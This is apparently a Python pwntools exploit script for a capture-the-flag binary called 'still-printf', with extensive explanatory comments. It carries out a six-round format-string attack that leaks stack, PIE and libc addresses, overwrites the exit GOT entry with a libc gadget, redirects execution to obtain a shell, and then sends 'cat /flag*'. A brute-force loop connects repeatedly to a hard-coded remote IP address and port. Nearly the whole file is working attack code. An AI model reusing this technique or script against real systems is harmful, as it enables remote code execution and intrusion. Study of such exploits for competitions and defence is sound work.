#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
import subprocess
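def PID():
    """Print the PID(s) of a locally running ``still-printf`` (debug aid).

    Only meaningful when the target is spawned locally (the commented-out
    ``process('./still-printf')`` path in the driver loop), e.g. to attach a
    debugger; against the remote instance there is nothing to find.
    Never raises: a missing ``pidof`` or no matching process is reported on
    stdout instead of surfacing as CalledProcessError/FileNotFoundError.
    """
    try:
        # check=False: pidof exits non-zero when nothing matches, which is a
        # normal answer for a debug helper, not an error.
        result = subprocess.run(
            ['pidof', 'still-printf'], capture_output=True, check=False
        )
    except FileNotFoundError:
        print('pidof is not available on this host')
        return
    if result.returncode != 0:
        print('still-printf is not running')
    else:
        print(result.stdout.decode(errors='replace').strip())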
# Addr
# Offsets into the libc build the challenge ran against. They are specific to
# that build (and to the ./still-printf binary loaded in Hack()); against any
# other libc every one of them has to be recomputed.
system = 0x449c0            # system() offset; assigned here but not used by the visible code
gadget1 = 0x448a3           # value Hack() writes into exit@GOT; the follow-up
                            # `cat /flag*` implies it yields a shell on its own
                            # (presumably a one_gadget address)
libc_leak_offset = 0x2409b  # distance from the pointer leaked via %13$p to libc base
# Hack
def Hack() -> None:
    """Run the six-round format-string exploit over the global ``io`` tube.

    Reads the module-level libc offsets and ``io`` (opened by the caller).
    Every payload is padded with ljust() to 0x20/0x28 bytes and then carries a
    7-byte, NUL-free pointer, i.e. 0x2f bytes at most -- presumably the
    target's read size. The %N$ argument indexes, 0x1200, 0x1100, 0x30 and the
    libc offsets are all tied to this binary's stack frame and libc build and
    do not transfer to another build. Any EOF/timeout raised by pwntools
    propagates to the caller, which simply retries on a fresh connection.
    """
    global io
    # Local copy of the challenge binary; only exe.got["exit"] is used.
    exe = ELF('./still-printf')
    magic_number = 0x1337
    # Round 1: %p leaks a stack pointer (2nd vararg); the %c's only add to the
    # byte count. 13 %c's + 14 chars of %p = (0xd + 0x5 + 0x8) = 26 bytes, so
    # the padded %c brings the count to magic_number+1 (0x1338) for %hn, which
    # stores it through whatever pointer is the 15th vararg. The second width
    # then brings the low byte to 0xdd for %41$hhn.
    # NOTE(review): what 0x1337/0x1338 means to the target, and what the
    # 15th/41st varargs point at (both lie beyond the 0x2f-byte buffer), is
    # not visible here -- confirm against the binary.
    payload = ('%c%p'+'%c'*8 +'%c%c%c' +f'%{ (magic_number + 1 ) - (0xd + 0x5 + 0x8 )}c'+'%hn'+f'%{ 0xdd - ( (magic_number+1)&0xff) }c'+'%41$hhn').ljust(0x2f)
    print(hex(len(payload)))
    io.send(payload)
    # Sync on the byte 0xd0, presumably printed by the leading %c (low byte of
    # the 1st vararg), right before the 14-char %p output. Relies on pwntools
    # coercing the str '\xd0' to the single byte 0xd0 -- verify with the
    # installed pwntools version.
    io.recvuntil('\xd0')
    stack_leak = int(io.recvn(14),0)
    print(hex(stack_leak))
    # Round 2: judging by the offsets used below (0x20 -> %10, 0x28 -> %11),
    # the format buffer itself starts at vararg 6, so the pointer placed at
    # buffer offset 0x28 is what %11$hhn writes 0xdd through: stack_leak-0x8.
    # %12$p/%13$p then read the two stack slots just past the buffer: a PIE
    # pointer and a libc pointer.
    # NOTE(review): 0xdd is re-written to *(stack_leak-0x8) in every round; it
    # looks like the low byte of a return address that keeps the target's
    # printf loop alive (stack_leak-0x8 would be printf's own return slot if
    # the buffer sits at the caller's rsp) -- confirm.
    payload2 = f'%{0xdd}c%11$hhn%12$p%13$p'.ljust(0x28,'A').encode() + p64(stack_leak - 0x8)[0:7]
    io.send(payload2)
    io.recvuntil('\xd0')
    # 0x1200 / libc_leak_offset: build-specific distances of the two leaked
    # values from their image bases.
    pie_base = int(io.recvn(14),0) - 0x1200
    libc_leak = int(io.recvn(14),0)
    libc_base = libc_leak - libc_leak_offset
    print(hex(libc_base))
    print(hex(pie_base))
    # Round 3: vararg 10 (buffer offset 0x20) is pointed at stack_leak+0x30,
    # the slot %12$p was read from, and %10$hn replaces that slot's low 16
    # bits with exit@GOT -- turning it into a pointer to exit's GOT entry.
    # Assumes the slot's upper bits already equal those of exit@GOT (both are
    # PIE addresses; a carry out of bit 15 breaks this).
    # NOTE(review): if (exit@GOT & 0xffff) < 0xdd the computed width is
    # negative and the f-string emits '%-Nc', giving a wrong count; such
    # failures are absorbed by the caller's retry loop rather than handled.
    payload3 = f'%{0xdd}c%11$hhn%{ ((pie_base+exe.got["exit"] )&0xffff) - 0xdd}c%10$hn'.ljust(0x20,'A').encode() + p64(stack_leak + 0x30)+p64(stack_leak - 0x8)[0:7]
    print(hex(len(payload3)))
    io.send(payload3)
    # Round 4: vararg 12 now points at exit@GOT; %12$hn stores the low 16 bits
    # of the gadget address there. Padding is NUL here, not 'A' (no effect on
    # the format parse since the string already terminated).
    payload4 = f'%{0xdd}c%11$hhn%{ ( (libc_base+gadget1)&0xffff ) - 0xdd}c%12$hn'.ljust(0x28,'\0').encode() + p64(stack_leak - 0x8)[0:7]
    io.send(payload4)
    # Round 5: vararg 10 is pointed at exit@GOT+2 and bits 16..31 of the
    # gadget are stored, completing a 32-bit overwrite; the top 16 bits of the
    # original libc pointer are assumed to match the gadget's (same mapping).
    # The same negative-width caveat as round 3 applies to this width.
    payload5 = f'%{0xdd}c%11$hhn%{ ( ( ( (libc_base+gadget1)&0xffffffff)&0xffff0000 ) >> 16 ) - 0xdd}c%10$hn'.ljust(0x20,'A').encode() + p64(pie_base+exe.got['exit']+0x2)+p64(stack_leak - 0x8)[0:7]
    io.send(payload5)
    # Round 6: vararg 10 now points at stack_leak-0x8 (a full 8-byte pointer
    # this time) and gets the low 16 bits of pie_base+0x1100; vararg 11 is
    # zeroed so nothing else is written. Presumably this redirects control
    # (the same slot the 0xdd byte was keeping alive) to code that calls
    # exit() -> overwritten GOT -> gadget; the caller then sends `cat /flag*`.
    payload6 = f'%{ (pie_base + 0x1100 )&0xffff}c%10$hn'.ljust(0x20,'\0').encode()+p64(stack_leak-0x8) + p64(0)[0:7]
    print(hex(len(payload6)))
    io.send(payload6)
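# Brute-force driver. Hack() silently depends on the randomised layout
# (computed %Nc widths must stay positive, upper bits of partially
# overwritten pointers must already match), so a failed round just means
# "reconnect and try again"; 4096 bounds the number of attempts.
for attempt in range(4096):
    io = None
    try:
        #io = process('./still-printf')
        # Hard-coded challenge instance (presumably the CTF infrastructure).
        io = remote('168.119.161.224', 9509)
        Hack()
        # If the GOT overwrite landed, the target is now running a shell.
        io.sendline('cat /flag*')
        data = io.recv()
        print(data)
        io.interactive()
        # The interactive session ended: stop here instead of reconnecting
        # for the remaining attempts (the original loop kept going).
        break
    except KeyboardInterrupt:
        # The original bare `except:` swallowed this too, making Ctrl-C
        # useless while the loop was retrying.
        raise
    except Exception as exc:
        # Bad leak / EOF / crashed target: say why before retrying instead of
        # hiding every failure.
        print(f'attempt {attempt} failed: {exc!r}')
    finally:
        # Close on every path. The original only closed on failure and would
        # have hit NameError if remote() itself failed on the first attempt,
        # since `io` was not yet bound.
        if io is not None:
            io.close()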